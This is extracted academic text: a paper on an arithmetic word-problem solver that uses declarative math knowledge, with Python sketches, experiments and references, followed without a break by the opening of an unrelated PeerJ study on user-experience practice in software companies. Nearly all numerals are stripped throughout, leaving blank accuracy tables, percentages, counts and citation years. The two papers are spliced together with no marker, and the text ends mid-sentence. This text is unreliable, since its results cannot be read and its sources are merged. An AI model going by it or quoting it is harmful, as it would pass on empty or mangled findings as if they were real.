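As an illustration of the first learning stage, the sketch below performs one subgradient step on the latent-structured hinge objective for $w_r$ given above. The rule inventory, the feature function phi_r and the toy usage are hypothetical stand-ins, not the authors' optimizer or released code.

import numpy as np

def stage_one_update(w_r, problem, gold_ops, rules_per_concept, phi_r, lr=0.1):
    # One stochastic subgradient step of the stage-one objective: for every
    # operation of the gold expression, compare the loss-augmented best rule
    # in its concept with the best rule that generates the gold operation.
    for concept, gold_op in gold_ops:
        rules = rules_per_concept[concept]           # list of (rule_id, operation)
        scores_aug = [np.dot(w_r, phi_r(problem, r)) + float(op != gold_op)
                      for r, op in rules]
        best_aug = int(np.argmax(scores_aug))
        gold_candidates = [(i, np.dot(w_r, phi_r(problem, r)))
                           for i, (r, op) in enumerate(rules) if op == gold_op]
        best_gold = max(gold_candidates, key=lambda t: t[1])[0]
        if best_aug != best_gold:
            w_r = w_r + lr * (phi_r(problem, rules[best_gold][0])
                              - phi_r(problem, rules[best_aug][0]))
    return w_r

# Toy usage with two dummy transfer rules and two-dimensional rule features.
def phi_r(problem, rule_id):
    return np.array([1.0, float(rule_id == "have_give_coref")])

rules = {"transfer": [("have_give_coref", "+"), ("have_give_nocoref", "-")]}
w_r = stage_one_update(np.zeros(2), "stephen owns ...", [("transfer", "+")], rules, phi_r)
print(w_r)   # the weight on the gold rule's feature increases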
note that fixing the parameters of wr determines the scores for rule selection, removing the need for any latent variables at this stage. . inference given an input word problem x, inferring the best math expression involves computing arg maxy∈y score(x,y), where y is the set of all math expressions that can be created by combining the numbers in x with basic math operations. the size of y is exponential in the number of quantities mentioned in x. as a result, we perform approximate inference using beam search. we ini- tialize the beam with the set e of all numbers men- tioned in the problem x. at each step of the beam search, we choose two numbers (or sub-expressions) e and e from e, and then select a math concept and a declarative rule to infer an operation o. we cre- ate a new sub-expression e by combining the sub- expressions e and e with operation o. we finally create a new set e′ from e, by removing e and e from it, and adding e to it. we remove e from the beam, and add all such modified sets e′ to the beam. we continue this process until all sets in the beam have only one element in them. we choose the highest scoring expression among these elements as the solution expression. model and implementation details . supervision each word problem in our dataset is annotated with the solution math expression, along with alignment of numbers from the problem to the solution expres- sion. in addition, we also have annotations for the numbers which possess a rate component. an ex- ample is shown in fig . this is the same level of supervision used in roy and roth ( ). many of the annotations can be extracted semi-automatically. the number list is extracted automatically by a num- ber detector, the alignments require human supervi- sion only when the same numeric value is mentioned multiple times in the problem. most of the rate com- ponent annotations can also be extracted automati- cally, see roy and roth ( ) for details. we apply a few heuristics to obtain noisy anno- problem: mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? number list: , , solution: ( [ ] + [ ])/ [ ] = rates: figure : annotations in our dataset. number list refers to the numbers detected in the problem. the subscripts in the solution indicate the position of the numbers in the number list. tations for the math concepts for operations. con- sider the case for combining two numbers num and num , by operation o. we apply the following rules: . if we detect an explicit math pattern in the neighborhood of num or num , we assign concept ko to be explicit math. . if o is multiplication or division, and one of num or num has a rate component, we as- sign ko to be dimensional analysis. . if o is addition or subtraction, we check if the dependent verb of both numbers are identical. if they are, we assign ko to be a part-whole re- lationship; otherwise, we assign it to be trans- fer. we extract the dependent verb using the stanford dependency parser (chen and man- ning, ). the annotations obtained via these rules are of course not perfect. we could not detect certain uncommon rate patterns like “dividing the cost ways”, and “i read the same number of books days running”. there were part-whole relationships ex- hibited with complementary verbs, as in “i won games, and lost .”. both of these cases lead to noisy math concept annotations. 
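A minimal sketch of the concept-annotation heuristics above is shown below, assuming the neighborhood text, rate component and dependent verb of each number have already been extracted; the field names and the explicit-math pattern list are illustrative rather than the released implementation.

import re

EXPLICIT_MATH = re.compile(r"\b(more|less|taller|shorter|heavier|times|twice|thrice)\b")

def annotate_concept(op, num1, num2):
    # Return a (noisy) concept label for combining num1 and num2 with op,
    # or None if no heuristic applies. num1/num2 are dicts with keys
    # 'context' (neighborhood text), 'rate' and 'verb'.
    if EXPLICIT_MATH.search(num1["context"]) or EXPLICIT_MATH.search(num2["context"]):
        return "explicit_math"
    if op in ("*", "/") and (num1["rate"] is not None or num2["rate"] is not None):
        return "dimensional_analysis"
    if op in ("+", "-"):
        return "part_whole" if num1["verb"] == num2["verb"] else "transfer"
    return None

# "She baked ... pecan pies and ... apple pies", combined by '+':
n1 = {"context": "she baked pecan pies", "rate": None, "verb": "baked"}
n2 = {"context": "and apple pies", "rate": None, "verb": "baked"}
print(annotate_concept("+", n1, n2))   # prints "part_whole"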
however, we tested a small sample of these anno- tations, and found less than % of them to be wrong. as a result, we assume these annotations to be cor- rect in our problem formulation. . features we use dependency parse labels and a small set of rules to extract subject, indirect object, depen- dent verb, unit and rate component of each number mentioned in the problem. details of these extrac- tions can be found in the released codebase. us- ing these extractions, we define two feature func- tions φk(x,ko) and φr(x,ro), where x is the in- put word problem, and ko and ro are the concept and the declarative rule for operation o respectively. φr(x,r o) constitutes the following features: . if ro contains coref(·) function, we add fea- tures related to similarity of the arguments of coref(·) (jaccard similarity score and presence of pronoun in one of the arguments). . for part-whole relationships, we add indica- tors for a list of words like “remaining”, “rest”, “either”, “overall”, “total”, conjoined with the part-whole function in ro (hyponymy, hyper- nymy, sibling). . unigrams from the neighborhood of numbers being combined. finally, φk(x,ko) generates the following features: . if ko is related to dimensional analysis, we add features indicating the presence of a rate com- ponent in the combining numbers. . if ko is part-whole, we add features indicating whether the verbs of combining numbers are identical. note that these features capture several interpretable functions like coreference, hyponymy, etc. we do not learn three components of our system – verb classification for transfer knowledge, catego- rization of explicit math terms, and irrelevant num- ber detection. for verb classification, we use a seed list of around verbs for each category. given a new verb v, we choose the most similar verb v′ from the seed lists according to the glove vector (pen- nington et al., ) based similarity . we assign v the category of v′. this can be replaced by a learned component (hosseini et al., ). however we found the seed list based categorization worked well in most cases. for explicit math, we check for a small list of patterns to detect and categorize math terms. note that for both the cases above, we still have to learn coref(·) function to determine the fi- nal operation. finally, to detect irrelevant numbers (numbers which are not used in the solution), we use a set of rules based on the units of numbers. again, this can be replaced by a learned model (roy and roth, ). experiments . results on existing dataset we first evaluate our approach on the existing datasets of allarith, allarithlex, and allar- ithtmpl (roy and roth, ). allarithlex and al- larithtmpl are subsets of the allarith dataset, cre- ated to test the robustness to new vocabulary, and new equation forms respectively. we compare to the top performing systems for arithmetic word prob- lems. they are as follows: . template : template based algebra word problem solver of kushman et al. ( ). . lca++ : system of roy and roth ( ) based on lowest common ancestors of math expres- sion trees. . unitdep: unit dependency graph based solver of roy and roth ( ). we refer to our approach as knowledge. for all solvers, we use the system released by the respec- tive authors. the system of template expects an equation as the answer, whereas our dataset contains only math expressions. we converted expressions to equations by introducing a single variable and as- signing the math expression to it. 
for example, an expression “( + )” gets converted to “x = ( + )”. the first few columns of table shows the per- formance of the systems on the aforementioned datasets . the performance of knowledge is on par or lower than some of the existing systems. we analyzed the systems, and found most of them to not be robust to perturbations of the problem text; table shows a few examples. we further ana- lyzed the datasets, and identified several biases in the problems (in both train and test). systems which remember these biases get an undue advantage in evaluation. for example, the verb “give” only ap- pears with subtraction, and hence the models are results on the allarith datasets are slightly different from (roy and roth, ), since we fixed several ungrammatical sentences in the dataset system allarith allarith lex allarith tmpl aggregate aggregate lex aggregate tmpl train on allarith, test on perturb template . . . . . . . lca++ . . . . . . . unitdep . . . . . . . knowledge . . . . ∗ . ∗ . . ∗ table : accuracy in solving arithmetic word problems. all columns except the last report -fold cross validation results. ∗ indicates statistically significant improvement (p = . ) over second highest score in the column. problem systems which solved correctly trained on allarith trained on aggregate adam has marbles. adam gave marbles to sam. how many marbles does adam have now? template, unitdep, lca, knowledge lca, unitdep, knowledge adam has marbles. sam gave marbles to adam. how many marbles does adam have now? knowledge template, knowledge adam has marbles. sam has more marbles than adam. how many marbles does sam have? lca, unitdep, knowledge lca, unitdep, knowledge adam has marbles. adam has more marbles than sam. how many marbles does sam have? template, knowledge template, knowledge table : pairs of pertubed problems, along with the systems which get them correct learning an erroneous correlation of “give” with sub- traction. since the test also exhibits the same bias, these systems get all the “give”-related questions correct. however, they fail to solve the problem in table , where “give” results in addition. we also tested knowledge on the addition subtraction problems dataset released by hosseini et al. ( ). it achieved a cross validation accuracy of . %, which is competitive with the state of the art accu- racy of % achieved with the same level of supervi- sion. the system of mitra and baral ( ) achieved . % accuracy on this dataset, but requires rich annotations for formulas and alignment of numbers to formulas. . new dataset creation in order to remove the aforementioned biases from the dataset, we augment it with new word problems collected via a crowdsourcing platform. these new word problems are created by perturbing the original problems minimally, such that the answer is differ- ent from the original problem. for each word prob- lem p with an answer expression a in our original dataset allarith, we replace one operation in a to create a new math expression a′. we ask annotators to modify problem p minimally, such that a′ is now the solution to the modified word problem. we create a′ from a either by replacing an addi- tion with subtraction or vice versa, or by replacing multiplication with division or vice versa. we do not replace addition and subtraction with multiplication or division, since there might not be an easy per- turbation that supports this conversion. we only al- lowed perturbed expressions which evaluate to val- ues greater than . 
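the perturbation step described above can be summarized in a few lines. the sketch below, with made-up numbers, swaps a single operator (+ with -, or * with /) and keeps only candidates whose value exceeds a threshold; the exact threshold used in the study is not shown in this text, so it is left as a parameter here.

```python
# minimal sketch of answer-expression perturbation: swap one + <-> - or * <-> /
# and keep only perturbations whose value exceeds a threshold.

SWAP = {"+": "-", "-": "+", "*": "/", "/": "*"}

def perturbations(expr: str, min_value: float = 0.0):
    """yield (perturbed_expression, value) pairs obtained by swapping one operator."""
    tokens = expr.split()
    for i, tok in enumerate(tokens):
        if tok in SWAP:
            candidate = " ".join(tokens[:i] + [SWAP[tok]] + tokens[i + 1:])
            try:
                value = eval(candidate)  # expressions contain only numbers and + - * /
            except ZeroDivisionError:
                continue
            if value > min_value:
                yield candidate, value

# made-up example: "( 16 - 4 ) / 2" yields "( 16 + 4 ) / 2" and "( 16 - 4 ) * 2"
for cand, val in perturbations("( 16 - 4 ) / 2"):
    print(cand, "=", val)
```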
for example, we generate the expression “( + )” from “( - )”; we generated ex- pressions “( + )/ ” and “( - )* ” for the expres- sion “( - )/ ”. we generate all possible perturbed expressions for a given answer expression, and ask for problem text modification for each one of them. we show the annotators the original problem text p paired with a perturbed answer a′. the instructions advised them to copy over the given problem text, and modify it as little as possible so that the given math expression is now the solution to this modified problem. they were also instructed not to add or delete the numbers mentioned in the problem. if the original problem mentions two “ ”s and one “ ”, the modified problem should also contain two “ ”s and one “ ”. we manually pruned problems which did not yield the desired solution a′, or were too different from the input problem p. this procedure gave us a set of new word problems, which we refer to as perturb. finally we augment allarith with the problems of perturb, and call this new dataset ag- gregate. aggregate has a total of problems. the addition of the perturb problems ensures that the dataset now has problems with similar lex- ical items generating different answers. this mini- mizes the bias that we discussed in subsection . . to quantify this, consider the probability distribu- tion over operations for a quantity q, given that word w is present in the neighborhood of q. for an un- biased dataset, you will expect the entropy of this distribution to be high, since the presence of a sin- gle word in a number neighborhood will seldom be completely informative for the operation. we com- pute the average of this entropy value over all num- bers and neighborhood words in our dataset. allar- ith and perturb have an average entropy of . and . respectively, whereas aggregate’s average en- tropy is . , indicating that, indeed, the complete data set is significantly less biased. . generalization from biased dataset first, we evaluate the ability of systems to general- ize from biased datasets. we train all systems on allarith, and test them on perturb (which was cre- ated by perturbing allarith problems). the last col- umn of table shows the performance of systems in this setting. knowledge outperforms all other systems in this setting with around % absolute im- provement over unitdep. this shows that declara- tive knowledge allows the system to learn the correct abstractions, even from biased datasets. . results on the new dataset finally, we evaluate the systems on the aggre- gate dataset. following previous work (roy and roth, ), we compute two subsets of aggregate comprising problems each, using the mawps (koncel-kedziorski et al., ) system. the first, called aggregatelex, is one with low lexical repeti- tions, and the second called aggregatetmpl is one with low repetitions of equation forms. we also evaluate on these two subsets on a -fold cross val- idation. columns - of table show the perfor- mance of systems on this setting. knowledge sig- nificantly o utperforms o ther s ystems o n aggregate and aggregatelex, and is similar to unitdep on aggregatetmpl. there is a % absolute improve- ment on aggregatelex, showing that knowledge is significantly m ore r obust t o l ow l exical overlap between train and test. the last column of table also shows that the other systems do not learn the right abstraction, even when trained on aggregate. . 
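as a concrete illustration of the bias measure described above (the average entropy of the operation distribution conditioned on a word in a number's neighborhood), the sketch below assumes observations are available as (word, operation) pairs, one per number/word co-occurrence; the exact weighting of the average is not spelled out in the text, so averaging over observations is one plausible reading.

```python
# sketch of the dataset bias measure: entropy of the operation distribution
# conditioned on a neighborhood word, averaged over all observations.
import math
from collections import Counter, defaultdict

def average_conditional_entropy(observations):
    """observations: iterable of (word, operation) pairs, one per number/word co-occurrence."""
    by_word = defaultdict(Counter)
    for word, op in observations:
        by_word[word][op] += 1

    def entropy(counter):
        total = sum(counter.values())
        return -sum((c / total) * math.log2(c / total) for c in counter.values())

    # weight each word's entropy by how often it occurs, i.e. average over observations
    total_obs = sum(sum(c.values()) for c in by_word.values())
    return sum(sum(c.values()) * entropy(c) for c in by_word.values()) / total_obs

# toy example: "gave" always co-occurs with subtraction (entropy 0), "pies" with two operations
obs = [("gave", "-"), ("gave", "-"), ("pies", "+"), ("pies", "/")]
print(round(average_conditional_entropy(obs), 3))  # -> 0.5
```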
analysis

coverage of the declarative rules

we chose math concepts and declarative rules based on their prevalence in arithmetic word problems. we found that the four concepts introduced in this paper cover almost all the problems in our dataset; only missing problems involving application of area formulas. we also checked earlier arithmetic problem datasets from the works of hosseini et al. ( ) and roy and roth ( ), and found that the math concepts and declarative rules introduced in this paper cover all their problems.

a major challenge in applying these concepts and rules to algebra word problems is the use of variables in constructing equations. variables are often implicitly described, and it is difficult to extract units, dependent verbs, associated subjects and objects for the variables. however, we need these extractions in order to apply our declarative rules to combine variables. there has been some work to extract the meaning of variables (roy et al., ) in algebra word problems; an extension of this can possibly support the application of rules in algebra word problems. we leave this exploration to future work.

higher standard word problems often require the application of math formulas like ones related to area, interest, probability, etc. extending our approach to handle such problems will involve encoding math formulas in terms of concepts and rules, as well as adding concept-specific features to the learned predictors. the declarative rules under the explicit math category currently handle simple cases; this set needs to be augmented to handle complex number word problems found in algebra datasets.

gains achieved by declarative rules

table shows examples of problems which knowledge gets right, but unitdep does not:

table : examples which knowledge gets correct, but unitdep does not.
- isabel had pages of math homework and pages of reading homework. if each page had problems on it, how many problems did she have to complete total?
- tim's cat had kittens. he gave to jessica and to sara. he now has kittens. how many kittens did he have to start with?
- mrs. snyder made heart cookies. she made red cookies, and the rest are pink. how many pink cookies did she make?

the gains can be attributed to the injection of declarative knowledge. earlier systems like unitdep try to learn the reasoning required for these problems from the data alone. this is often difficult in the presence of limited data, and noisy output from nlp tools. in contrast, we learn probabilistic models for interpretable functions like coreference, hyponymy, etc., and then use declarative knowledge involving these functions to perform reasoning. this reduces the complexity of the target function to be learned considerably, and hence we end up with a more robust model.

effect of beam size

we used a beam size of in all our experiments. however, we found that varying the beam size does not affect the performance significantly. even lowering the beam size to reduced performance by only %.

weakness of approach

a weakness of our method is the requirement to have all relevant declarative knowledge during training. many of the component functions (like coreference) are learned through latent alignments with no explicit annotations. if too many problems are not explained by the knowledge, the model will learn noisy alignments for the component functions. table shows the major categories of errors with examples. % of the errors are due to extraneous number detection.
we use a set of rules based on units of numbers, to detect such irrelevant numbers. as a result, we fail to detect numbers which are irrelevant due to other factors, like associated entities, or associated verb. we can potentially expand our rule based system to detect those, or replace it by a learned module like roy and roth ( ).

table : examples of errors made by knowledge.
- irrelevant number detection ( %): sally had baseball cards, and were torn. sara bought of sally's baseball cards. how many baseball cards does sally have now?
- parsing rate component ( %): mary earns $ cleaning a home. how many homes did she clean, if she made dollars?
- coreference ( %): there are people on the green bay high track team. if a relay race is meters long, how far will each team member have to run?

another major source of errors is parsing of rate components; that is, understanding "earns $ cleaning a home" should be normalized to "$ per home". although we learn a model for coreference function, we make several mistakes related to coreference. for the example in table , we fail to detect the coreference between "team member" and "people".

conclusion

in this paper, we introduce a framework for incorporating declarative knowledge in word problem solving. our knowledge based approach outperforms all other systems, and also learns better abstractions from biased datasets. given that the variability in text is much larger than the number of declarative rules that governs math word problems, we believe that this is a good way to introduce math knowledge to a natural language understanding system. consequently, future work will involve extending our approach to handle a wider range of word problems, possibly by supporting better grounding of implicit variables and including a larger number of math concepts and declarative rules. an orthogonal exploration direction is to apply these techniques to generate summaries of financial or sports news, or generate statistics of war or gun violence deaths from news corpora. a straightforward approach can be to augment news documents with a question asking for the required information, and treating this augmented news document as a math word problem. code and dataset are available at https://github.com/cogcomp/arithmetic.

acknowledgments

we are grateful to anonymous reviewers for their insightful comments. this work is funded by darpa under agreement number fa - - - , and a grant from the allen institute for artificial intelligence (allenai.org).

references

yonatan bisk and julia hockenmaier. . simple robust grammar induction with combinatory categorial grammars. in proceedings of the twenty-sixth conference on artificial intelligence (aaai- ), pages – , toronto, canada, july.

ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint-driven learning. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , prague, czech republic. association for computational linguistics.

ming-wei chang, lev ratinov, and dan roth. . structured learning with constrained conditional models. machine learning, ( ): – .

danqi chen and christopher d. manning. . a fast and accurate dependency parser using neural networks. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics.

james clarke, dan goldwasser, ming-wei chang, and dan roth. .
driving semantic parsing from the world’s response. in proc. of the conference on com- putational natural language learning (conll), . gerald dejong. . investigating explanation-based learning. kluwer international series in engineering and computer science. kluwer academic publishers. gerald dejong. . explanation-based learning. in t. gonzalez, j. diaz-herrera, and a. tucker, editors, crc computing handbook: computer science and software engineering, pages . – . . crc press, boca raton. kuzman ganchev, joao graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research. kevin gimpel and mohit bansal. . weakly- supervised learning with cost-augmented contrastive estimation. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar, octo- ber. association for computational linguistics. mark hopkins, cristian petrescu-prahova, roie levin, ronan le bras, alvaro herrasti, and vidur joshi. . beyond sentential semantic parsing: tack- ling the math sat with a cascade of tree transducers. in proceedings of the conference on empirical methods in natural language processing, pages – , copenhagen, denmark, september. association for computational linguistics. mohammad javad hosseini, hannaneh hajishirzi, oren etzioni, and nate kushman. . learning to solve arithmetic word problems with verb categorization. in proceedings of the conference on empirical methods for natural language processing (emnlp). danqing huang, shuming shi, chin-yew lin, and jian yin. . learning fine-grained expressions to solve math word problems. in proceedings of the con- ference on empirical methods in natural language processing, pages – , copenhagen, denmark, september. association for computational linguis- tics. robin jia and percy liang. . adversarial exam- ples for evaluating reading comprehension systems. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics, september. daniel khashabi, tushar khot, ashish sabharwal, peter clark, oren etzioni, and dan roth. . ques- tion answering via integer programming over semi- structured knowledge. in proceedings of the interna- tional joint conference on artificial intelligence (ij- cai). rik koncel-kedziorski, hannaneh hajishirzi, ashish sabharwal, oren etzioni, and siena ang. . pars- ing algebraic word problems into equations. trans- actions of the association of computational linguis- tics. rik koncel-kedziorski, subhro roy, aida amini, nate kushman, and hannaneh hajishirzi. . mawps: a math word problem repository. in proceedings of the conference of the north american chapter of the association for computational linguistics. nate kushman, luke zettlemoyer, regina barzilay, and yoav artzi. . learning to automatically solve algebra word problems. in proceedings of the annual meeting of the association for computational linguis- tics (acl), pages – . percy liang, michael jordan, and dan klein. . learning dependency-based compositional semantics. in proceedings of the annual meeting of the associa- tion for computational linguistics (acl). wang ling, dani yogatama, chris dyer, and phil blun- som. . program induction by rationale gener- ation: learning to solve and explain algebraic word problems. in proceedings of the th annual meeting of the association for computational linguistics. 
takuya matsuzaki, takumi ito, hidenao iwane, hirokazu anai, and noriko h. arai. . semantic parsing of pre-university math problems. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , vancouver, canada, july. association for computational linguistics.

arindam mitra and chitta baral. . learning to use formulas to solve simple arithmetic problems. in proceedings of the th annual meeting of the association for computational linguistics.

tahira naseem, harr chen, regina barzilay, and mark johnson. . using universal linguistic knowledge to guide grammar induction. in proceedings of the conference on empirical methods in natural language processing, emnlp ' , pages – , stroudsburg, pa, usa. association for computational linguistics.

jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp).

dan roth and wen-tau yih. . a linear programming formulation for global inference in natural language tasks. in hwee tou ng and ellen riloff, editors, proceedings of the conference on computational natural language learning (conll), pages – . association for computational linguistics.

subhro roy and dan roth. . solving general arithmetic word problems. in proc. of the conference on empirical methods in natural language processing (emnlp).

subhro roy and dan roth. . unit dependency graph and its application to arithmetic word problem solving. in proceedings of the conference on artificial intelligence (aaai).

subhro roy, shyam upadhyay, and dan roth. . equation parsing: mapping sentences to grounded equations. in proceedings of the conference on empirical methods in natural language processing (emnlp).

shuming shi, yuehui wang, chin-yew lin, xiaojiang liu, and yong rui. . automatically solving number word problems by semantic parsing and reasoning. in empirical methods in natural language processing.

noah smith and jason eisner. . annealing structural bias in multilingual weighted grammar induction. in proceedings of the annual meeting of the association for computational linguistics (acl), acl- , pages – , stroudsburg, pa, usa. association for computational linguistics.

shyam upadhyay, ming-wei chang, kai-wei chang, and wen-tau yih. . learning from explicit and implicit supervision jointly for algebra word problems. in proceedings of the conference on empirical methods in natural language processing.

lipu zhou, shuaixiang dai, and liwei chen. . learn to solve algebra word problems using quadratic programming. in proceedings of the conference on empirical methods in natural language processing.

integrating user experience practices into software development processes: implications of the ux characteristics

pariya kashfi, agneta nilsson and robert feldt
department of computer science and engineering, chalmers university of technology and gothenburg university, gothenburg, sweden

abstract

user experience (ux) is a key factor in the success of software systems. many software companies face challenges in their work with ux.
existing research does not analyze ux practices and challenges in relation to other software quality characteristics or, in particular, in relation to usability. a better understanding of these challenges can help researchers and practitioners better address them in the future. in this empirical study, we have interviewed practitioners with different backgrounds and occupations from eight software development companies. their responses are coded, and analyzed with thematic analysis. we report eight themes of challenges that practitioners face in their work with ux. while some of these challenges partly overlap with those reported in existing literature about usability or other software quality characteristics, the participants of our study either view many of the challenges as unique to ux, or more severe in the case of ux. although at a superficial level challenges of ux and other quality characteristics overlap, we differentiate these challenges at a deeper level through the five main characteristics of ux: subjective, holistic, dynamic, context- dependent and worthwhile. in particular, we identified that these characteristics have at least implications (i.e. additional difficulties) for day-to-day work of practitioners. we found that of these implications have been previously reported in literature. however, to the best of our knowledge, the remaining nine implications are unique to our study. these implications can explain why practitioners perceive the challenges to be more severe than for other quality characteristics. most importantly, they can explain the industry’s lopsided focus on the pragmatic aspect of ux. our findings can be useful for researchers in identifying new and industry-relevant research areas and for practitioners to learn from empirically investigated challenges in ux work, and base their improvement efforts on such knowledge. identifying and investigating the overlaps underlines the importance of these challenges, and can also help finding research areas not only for enhancing ux work but also software quality in general. it also makes it easier for practitioners to spot, better understand as well as find mitigation strategies for ux, through learning from past experiences and developments in the area of software quality. subjects human-computer interaction, software engineering keywords usability, software quality, quality requirements, user experience, non-functional requirements how to cite this article kashfi et al. ( ), integrating user experience practices into software development processes: implications of the ux characteristics. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:pariya.kashfi@chalmers.se mailto:p@puix.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. introduction as the software industry has matured, the demands that society puts on the quality of software systems have increased. it is no longer enough to focus only on the many functions that a piece of software should supply. to deliver a system that is consistent and of high quality there are a large number of characteristics that need to be considered (chung et al., ). 
some, such as testability, are internal or relate to the development process and mainly concern developers, while others such as performance and usability, are critical for users (international organisation for standardisation (iso), ). at an even broader level, the actual experience of the end users as they interact with the software needs to be taken into account. recently, this widening scope of software quality characteristics has led to the introduction and study of the concept of user experience (ux). even though different definitions of ux exist, they share the same essence: ux is a user’s holistic perception of functionality and quality characteristics of a piece of software (hassenzahl, ; wright & mccarthy, ; jordan, ). in general, ux literature emphasizes that assuring efficiency and effectiveness during use of the software, i.e high usability, does not guarantee that the end users will have a positive experience (hassenzahl, ). however, the perception of ux is generally different in academic and industrial contexts: whereas the former concentrates on hedonic aspects and emotions, the latter focuses more on functionality and usability issues (väänänen-vainio-mattila, roto & hassenzahl, ). current ux models (e.g., hassenzahl, ; wright & mccarthy, ) differ in their view on how various underlying elements and processes contribute to forming the end user’s overall experience with products and services. one of the well-known ux models is developed by hassenzahl (hassenzahl, ). it breaks ux down into pragmatic and hedonic attributes. pragmatic attributes concern usability and functionality of software (e.g., clear, supporting, useful and controllable). hedonic attributes, on the other hand, concern communicating identity, provoking memories, and providing stimulation (e.g., outstanding, impressive, exciting, and interesting). these attributes emphasize individuals’ psychological well-being. an end user’s perception of these attributes leads to a judgment about the product’s appeal (e.g., ‘‘it is good/bad’’), emotional consequences (e.g., pleasure, satisfaction) and behavioral consequences (e.g., increased time spent with the product). while pragmatic attributes concern achieving do-goals, hedonic attributes concern satisfying be-goals (hassenzahl, ). do-goals are the concrete outcome that the end user wishes to achieve whereas be-goals rest in essential human needs. to provide a better understanding of ux, hassenzahl (hassenzahl, ) emphasizes five characteristics of ux: subjective, holistic, dynamic, context-dependent and worthwhile. all software systems deliver some ux, positive or not, whether the ux has explicitly been taken into account during development. research has shown that certain practices can increase the likelihood of delivering a desirable ux (hassenzahl, ) (hereafter, ux practices). however, simply applying these practices in isolation is not enough (abrahão et al., ; ferreira, sharp & robinson, ; ovad & larsen, ). like methods and practices used to support other software quality characteristics (chung et al., ), they need to be integrated into development processes and considered throughout projects. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nevertheless, ux is often neglected in software projects and the ux state-of-practice is immature (abrahão et al., ; isomursu et al., ; law & abrahão, ). 
in order to improve the state-of-practice, we must first understand and address challenges that practitioners face in their everyday work with ux (hereafter ux challenges). to achieve this, the distinctions and interrelations between ux, usability and other software quality characteristics must first be properly analyzed. a number of studies claim to have studied ux challenges, but their results need to be interpreted with caution because they treat ux and usability as interchangeable (e.g., cajander, lárusdóttir & gulliksen, ; ardito et al., ; lanzilotti et al., ), or examine ux in isolation so its relation to usability and other software quality characteristics is not recognized (e.g., isomursu et al., ; vermeeren et al., ). our study aims to complement the current body of knowledge by investigating ux challenges while explicitly differentiating ux and usability. in doing so, we discuss these challenges in relation to the unique characteristics of ux. we also contribute to the current literature by providing an explanation for the industry’s lopsided focus on the pragmatic aspect of ux. also, in our analysis, we examine how the handling of ux compares to the handling of general software quality characteristics, especially usability. here, we report our findings and answer the following research questions: what challenges do practitioners face when integrating ux practices into software development processes and organizations?, and how do ux challenges relate to challenges of handling software quality characteristics, in particular usability? our findings can be useful for researchers in identifying new and industry-relevant research areas, and for practitioners in learning from empirically investigated ux challenges, and basing their improvement efforts on such knowledge. the structure of this paper is as follows: the second section provides background on the topic and summarizes the related literature. the third section describes our research methodology and presents the different research sites. the fourth section presents the results from our study: the identified themes of challenges. the fifth section discusses our findings and puts them in relation to the current literature. the last section concludes our study and suggests future research. background and related work this section elaborates on the characteristics of ux and their implications for ux work. understanding these characteristics is important when analyzing and discussing our findings on ux challenges because it provides a basis for comparing and contrasting ux with usability and other software quality characteristics. this section also summarizes related empirical studies on software quality characteristics, in particular, usability and ux. ux is dominated by subjective aspects of human perception (wright & mccarthy, ; hassenzahl, ). for instance, one user may perceive particular software features as simple, novel, and admirable while another may perceive them as complicated and old. other software quality characteristics can be treated more objectively, at least in theory (kashfi et al., ). the term subjective has also been used in requirements literature to highlight that since quality characteristics are hard to measure, practitioners tend to judge them based on their personal opinion (chung et al., ; paech & kerlow, ). kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. here, we use this term to refer to its meaning in the context of ux. 
currently, the most efficient and feasible approach to measure perception and emotion of users is to directly gather their opinions, and let them express themselves (law, van schaik & roto, ). this is often performed through questionnaires or scales (e.g., attrakdiff, self-assessment manikin, affect gird zimmermann, ). however, to gain reliable results, practitioners need to gather responses from statistically significant number of heterogeneous users (law, van schaik & roto, ). ux is also holistic and not totally reducible to its complexly intertwined underlying elements (hassenzahl, ). ux emerges from underlying functionality and quality characteristics of software, and the user’s perception of them in a given situation (hassenzahl, ). the holistic nature of ux resembles the cross-cutting nature of other quality characteristics. in both cases, more than one functionality is affected by the related requirements. however, in the case of ux, this interrelation is more complex, especially considering that ux is dynamic (aka temporal) and thus a user’s perception of the ux underlying elements changes over time (hassenzahl & tractinsky, ). although practitioners may manipulate ux of a product through its underlying elements, they cannot guarantee a certain holistic ux (wright & mccarthy, ; hassenzahl, ). practitioners can only to some extent increase the likelihood of delivering a certain ux (hassenzahl & tractinsky, ). consequently, there is no consensus in the community on how ux should be designed or measured and whether the overall ux of a piece of software can be predicted by merely manipulating and measuring these elements (law, van schaik & roto, ). this is explained further below. ux is dynamic and emerges and changes over time (hassenzahl, ). for example, over time, the user may find a novel feature as old, or a complex feature as simple. hence, in designing and evaluating ux, practitioners should pay certain attention to different episodes of experience (hassenzahl, ); namely expected experience (before usage), momentary experience (during usage), remembered experience (shortly after usage) and accumulated experience (over longer period of use) (hassenzahl, ). practitioners need to decide which episodes are more important than others for the software being developed and why; for instance, for an e-marketing website first impression is more important than it is for a work application. this knowledge can then help them suggest more suitable design solutions. ux research uses the term context-dependent (aka situated) to emphasize that any experience is unique, unrepeatable, and situated in its context (wright & mccarthy, ). nevertheless, experiences can be categorised because their essence is the same, i.e., they connect to essential human needs or be-goals (hassenzahl, ). implications of being context-dependent largely overlap the implications we discussed for the holistic nature of ux. ux is worthwhile (aka positive), meaning that it focuses on value and creating desirable experiences than only preventing negative ones, i.e., the focus of usability (hassenzahl, ). while usability concerns removing problem, frustration, and stress (i.e., negative), ux is based on the idea that removal of 